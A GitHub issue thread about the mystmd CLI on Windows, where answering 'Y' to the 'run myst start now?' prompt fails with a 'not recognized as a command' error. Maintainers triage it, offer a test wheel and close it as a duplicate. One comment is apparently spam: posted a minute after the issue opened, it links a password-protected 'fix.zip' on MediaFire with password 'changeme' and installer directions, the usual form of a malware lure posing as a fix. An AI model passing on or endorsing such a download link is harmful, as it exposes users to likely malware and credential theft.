### ISSUE TITLE
Error in init `'Y' is not recognized ....`

### ISSUE THREAD

**Issue by jonmatthis** [jupyter-book/mystmd#1502] opened 2024-08-29 14:35 UTC
Running in a `cmd` teminal on Windows 11

1. Running `myst`

2.  (terminal returns immediately and then I have to wait a kind of strangely long amount of time, which is not the topic of this Issue but its still strange lol)

3. Boilerplate welcome text shows up with the last line `? Would you like to run myst start now? (Y/n)`

4. Enter `Y`

5. `'Y' is not recognized as an internal or external command`

```
Welcome to the MyST CLI! 🎉 🚀

myst init walks you through creating a myst.yml file.

You can use MyST to:

 - create interactive websites from markdown and Jupyter Notebooks 📈
 - build & export professional PDFs and Word documents 📄

Learn more about this CLI and MyST Markdown at: https://mystmd.org


💾 Updating .gitignore
💾 Writing new project and site config file: myst.yml

? Would you like to run myst start now? (Y/n)Y
'Y' is not recognized as an internal or external command,
operable program or batch file.
```

A lowercase `y` or simply pressing `ENTER`  works fine, but its pretty confusing that the recommended default response `Y` causes an error

**Comment by jungminjun824** [comment] 2024-08-29 14:36
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rowanc1** [comment] 2024-08-29 14:37
Thanks for the report. Related (maybe the same): #1425

**Comment by agoose77** [comment] 2024-09-02 15:38
@jonmatthis would you be able to try out this wheel? 
[mystmd-1.3.4-py3-none-any.whl.zip](https://github.com/user-attachments/files/16839407/mystmd-1.3.4-py3-none-any.whl.zip)

Let me know if it fixes it!

**Comment by agoose77** [comment] 2024-09-02 15:57
Duplicate of #1425

**Closed by agoose77** 2024-09-02 15:57 UTC
Labels: bug
